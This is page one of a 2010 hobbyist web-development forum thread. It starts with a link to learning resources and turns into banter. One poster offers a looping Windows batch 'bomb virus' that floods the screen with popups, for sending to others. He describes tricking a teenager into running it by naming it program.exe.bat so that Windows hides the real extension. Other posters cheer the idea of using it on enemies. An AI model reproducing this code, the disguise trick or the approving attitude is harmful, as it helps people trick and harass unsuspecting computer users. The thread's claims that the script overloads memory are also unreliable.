Compile Crazy
Would you like to react to this message? Create an account in a few clicks or log in to continue.

HomePortalLatest imagesSearchRegisterLog in

the basics

Go down 
4 posters
Go to page : 1, 2  Next
AuthorMessage
Excimer Sun Software

Excimer Sun Software

the basics Empty
PostSubject: the basics   the basics I_icon_minitimeTue May 18, 2010 8:54 am

Here's a link to an excellent site for learning the basics of just about every topic in web development that you could imagine:
http://www.w3schools.com
learn and have fun, my young padawans! Laughing
Back to top Go down
Compu-Teck Inc.

the basics Empty
PostSubject: Re: the basics   the basics I_icon_minitimeWed May 26, 2010 11:38 am

NOOOOOOO.... you are not to make that joke in my presence!! If you do so again, I will script you to death!!! lol. Cool
Back to top Go down
Excimer Sun Software

Excimer Sun Software

the basics Empty
PostSubject: re:the basics   the basics I_icon_minitimeSun May 30, 2010 12:10 pm

Ah, but scripting me to death would not be logical captain. Haha! Lol! Laughing
Back to top Go down
Excimer Sun Software

Excimer Sun Software

the basics Empty
PostSubject: speaking of which....   the basics I_icon_minitimeFri Jul 23, 2010 11:41 am

Speaking of scripting, I highly recommend that all would-be web developers learn JavaScript. It is very important for making dynamic web sites, like this forum!
Back to top Go down
The Fellow
Admin
The Fellow

the basics Empty
PostSubject: Re: the basics   the basics I_icon_minitimeSun Jul 25, 2010 11:32 am

I want to just say that this site is only there to help you learn the basics, and that to be good at web development you must practice, and learn when it is best to do things one way, over another.
Back to top Go down
https://compilecrazy.forumotion.net
Excimer Sun Software

Excimer Sun Software

the basics Empty
PostSubject: Re: the basics   the basics I_icon_minitimeSun Jul 25, 2010 1:34 pm

Well said Fellow!
Back to top Go down
Compu-Teck Inc.

the basics Empty
PostSubject: Re: the basics   the basics I_icon_minitimeWed Aug 25, 2010 1:26 pm

Excimer Sun Software wrote:
Ah, but scripting me to death would not be logical captain. Haha! Lol! Laughing

Or would it, ESS?... bum bum bum! Laughing Cool
Back to top Go down
Excimer Sun Software

Excimer Sun Software

the basics Empty
PostSubject: Re: the basics   the basics I_icon_minitimeWed Aug 25, 2010 6:43 pm

Dunno, I just had to get another Sci-Fi reference in.Laughing Next question, are you sure that you could script me to death? How about I sniff your network traffic instead? Yes, I wrote a script for that. Twisted Evil (no joke! Seriously!Smile) ...dum dum dum dom da dum dom da dum...!
Back to top Go down
Compu-Teck Inc.

the basics Empty
PostSubject: Re: the basics   the basics I_icon_minitimeThu Aug 26, 2010 9:04 am

You know what? If you make sci-fi jokes, I will make gaming jokes! Now, don't make me stomp you like a Goomba!!
Back to top Go down
gamerboy

gamerboy

the basics Empty
PostSubject: Re: the basics   the basics I_icon_minitimeTue Aug 31, 2010 5:48 pm

what this, nerd wars? ok, then. i will DOS attack your windows!

Here is a very simple bomb virus. save it in a .bat and send it to someone. DONT OPEN IT.

Code:
echo off

:start

MSG * This is a virus.

MSG * You opened it.

MSG * You are an idiot.

MSG * POPUP ATTACK!

GOTO :start
Back to top Go down
http://gamerboy8864hacks.freeforums.org
Compu-Teck Inc.

the basics Empty
PostSubject: Re: the basics   the basics I_icon_minitimeWed Sep 01, 2010 8:52 am

This is nice and evil!!! It is something I may use on some of my enemies!! I can see that this will overload the memory!
Back to top Go down
gamerboy

gamerboy

the basics Empty
PostSubject: Re: the basics   the basics I_icon_minitimeWed Sep 01, 2010 5:13 pm

Compu-Teck Inc. wrote:
This is nice and evil!!! It is something I may use on some of my enemies!! I can see that this will overload the memory!

Twisted Evil YESSS, i like my virus. i sent it to a jerk, and he tried to fix it with an antivirus, and everytime he did a scan, he ran it, thinking that there was something else in the program. Razz
Back to top Go down
Excimer Sun Software

Excimer Sun Software

the basics Empty
PostSubject: Re: the basics   the basics I_icon_minitimeWed Sep 01, 2010 9:15 pm

Simple, yet effective. Me like. Twisted Evil Such an easy way to make a computer go down. Flood the main memory (RAM) and overload the buffer. Freezes the computer up nicely. Smile
Back to top Go down
Compu-Teck Inc.

the basics Empty
PostSubject: Re: the basics   the basics I_icon_minitimeFri Sep 17, 2010 8:57 am

gamerboy wrote:

Twisted Evil YESSS, i like my virus. i sent it to a jerk, and he tried to fix it with an antivirus, and everytime he did a scan, he ran it, thinking that there was something else in the program. Razz

The idiot actually tried an antivirus! Laughing
Back to top Go down
gamerboy

gamerboy

the basics Empty
PostSubject: Re: the basics   the basics I_icon_minitimeTue Sep 21, 2010 7:34 pm

yes, he was 16, and thought he was so awesome, it just pi**ed me off. i made this and sent it to him. he had windows, so i saved it as program.exe.bat so it looked like program.exe because windows cuts the file extension. lol! he later sent me a facebook message saying what the hack, some jerk f***ed up your program dude, please fix this. i sent him a new one, named thisisavirus.exe.bat . he still opened it. Razz we are no longer talking to each other, and i say riddance good
Back to top Go down
Compu-Teck Inc.

the basics Empty
PostSubject: Re: the basics   the basics I_icon_minitimeWed Sep 22, 2010 1:37 pm

Well, if he was an idiot, he deserved it!
Back to top Go down
Excimer Sun Software

Excimer Sun Software

the basics Empty
PostSubject: Re: the basics   the basics I_icon_minitimeSat Sep 25, 2010 5:40 pm

Well, not necessarily. But if he was really stupid enough to open a file that was called "thisisavirus", then he got what was coming to him anyways.
Back to top Go down
Compu-Teck Inc.

the basics Empty
PostSubject: Re: the basics   the basics I_icon_minitimeMon Sep 27, 2010 1:24 pm

My point exactly! See, this is the reason why you don't want to mess with computer geeks. We can just send a virus to your computers!!!! Twisted Evil Twisted Evil Twisted Evil Twisted Evil Twisted Evil
Back to top Go down
Excimer Sun Software

Excimer Sun Software

the basics Empty
PostSubject: Re: the basics   the basics I_icon_minitimeTue Oct 05, 2010 8:57 am

Twisted Evil All your base are belong to us!!!! Twisted Evil Twisted Evil Twisted Evil Twisted Evil
Back to top Go down
Compu-Teck Inc.

the basics Empty
PostSubject: Re: the basics   the basics I_icon_minitimeTue Oct 05, 2010 1:27 pm

Exactly!!! Twisted Evil Twisted Evil Twisted Evil Twisted Evil Twisted Evil Twisted Evil Twisted Evil Twisted Evil Twisted Evil Twisted Evil Twisted Evil Twisted Evil Twisted Evil Twisted Evil Twisted Evil Twisted Evil Twisted Evil Twisted Evil Twisted Evil Twisted Evil Twisted Evil Twisted Evil Twisted Evil Twisted Evil Twisted Evil Twisted Evil Twisted Evil Twisted Evil Twisted Evil Twisted Evil Twisted Evil Twisted Evil Twisted Evil Twisted Evil
Back to top Go down
gamerboy

gamerboy

the basics Empty
PostSubject: Re: the basics   the basics I_icon_minitimeTue Oct 05, 2010 8:42 pm

i find it a lot easier to just send them a threatening message that a fat lady will want to go out with them... but its just mean it doesnt say "dont mess with me" as well as a virus does.
Back to top Go down
gamerboy

gamerboy

the basics Empty
PostSubject: Re: the basics   the basics I_icon_minitimeTue Oct 05, 2010 8:45 pm

Excimer Sun Software wrote:
Well, not necessarily. But if he was really stupid enough to open a file that was called "thisisavirus", then he got what was coming to him anyways.
today, in my little brothers school, a very stupid thing happened. everyone was putting their chairs on top of the desks, and one kid had one of the desk/chair connected combo things. he spent 10 minutes trying ti pick up the chair and put it on the desk without moving the desk.

BTW, do you like my english now? ive been trying to learn the stupid abbreviations that you guys have, like rofl, and lol. ^_^
Back to top Go down
Compu-Teck Inc.

the basics Empty
PostSubject: Re: the basics   the basics I_icon_minitimeWed Oct 06, 2010 1:23 pm

gj!
Back to top Go down
Excimer Sun Software

Excimer Sun Software

the basics Empty
PostSubject: Re: the basics   the basics I_icon_minitimeThu Oct 07, 2010 12:38 am

gamerboy wrote:
today, in my little brothers school, a very stupid thing happened. everyone was putting their chairs on top of the desks, and one kid had one of the desk/chair connected combo things. he spent 10 minutes trying ti pick up the chair and put it on the desk without moving the desk.

BTW, do you like my english now? ive been trying to learn the stupid abbreviations that you guys have, like rofl, and lol. ^_^

That's hilarious!!! Laughing I can't believe that someone would actually try to do that! Also, good English.
Back to top Go down
gamerboy

gamerboy

the basics Empty
PostSubject: Re: the basics   the basics I_icon_minitimeSat Oct 09, 2010 11:53 am

Compu-Teck Inc. wrote:
gj!
good job?
college is going by so fast whats wrong with me Sad
Back to top Go down
Sponsored content

the basics Empty
PostSubject: Re: the basics   the basics I_icon_minitime

Back to top Go down

the basics
Page 1 of 2Go to page : 1, 2  Next